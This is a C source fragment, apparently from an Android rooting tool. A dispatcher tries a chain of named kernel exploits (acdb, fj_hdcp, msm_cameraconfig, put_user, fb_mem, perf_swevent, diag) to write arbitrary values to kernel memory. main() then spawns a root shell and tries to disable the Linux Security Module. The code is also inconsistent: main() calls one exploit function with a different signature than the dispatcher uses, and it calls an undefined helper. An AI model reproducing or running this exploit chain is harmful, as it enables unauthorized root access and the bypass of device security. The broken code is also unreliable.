bool
attempt_exploit(unsigned long int address,
unsigned long int write_value,
unsigned long int restore_value,
exploit_callback_t callback_func,
void *callback_param)
{
callback_info_t info;
info.func = callback_func;
info.param = callback_param;
info.result = false;
// Attempt exploits in most stable order
printf("Attempt acdb exploit...\n");
if (attempt_acdb_exploit(address, write_value, restore_value, &info)) {
return info.result;
}
printf("\n");
printf("Attempt fj_hdcp exploit...\n");
if (attempt_fj_hdcp_exploit(address, write_value, restore_value, &info)) {
return info.result;
}
printf("\n");
printf("Attempt msm_cameraconfig exploit...\n");
if (attempt_msm_cameraconfig_exploit(address, write_value, restore_value, &info)) {
return info.result;
}
printf("\n");
printf("Attempt put_user exploit...\n");
if (attempt_put_user_exploit(address, write_value, restore_value, &info)) {
return info.result;
}
printf("\n");
printf("Attempt fb_mem exploit...\n");
if (attempt_fb_mem_exploit(address, write_value, restore_value, &info)) {
return info.result;
}
printf("\n");
printf("Attempt perf_swevent exploit...\n");
if (perf_swevent_run_exploit(address, write_value, &run_callback, &info)) {
return info.result;
}
printf("\n");
if (attempt_diag_exploit(address, write_value, &info)) {
return info.result;
}
return false;
}
int
main(int argc, char **argv)
{
if (!attempt_fb_mem_exploit() && !run_other_exploits()) {
printf("failed to get root access\n");
exit(EXIT_FAILURE);
}
if (execl(SHELL_PATH, SHELL_PATH, NULL) == 0) {
exit(EXIT_SUCCESS);
}
if (errno != EPERM) {
printf("Failed to execute shell due to %s.\n", strerror(errno));
}
if (!attempt_to_disable_lsm()) {
exit(EXIT_FAILURE);
}
return execl(SHELL_PATH, SHELL_PATH, NULL);
}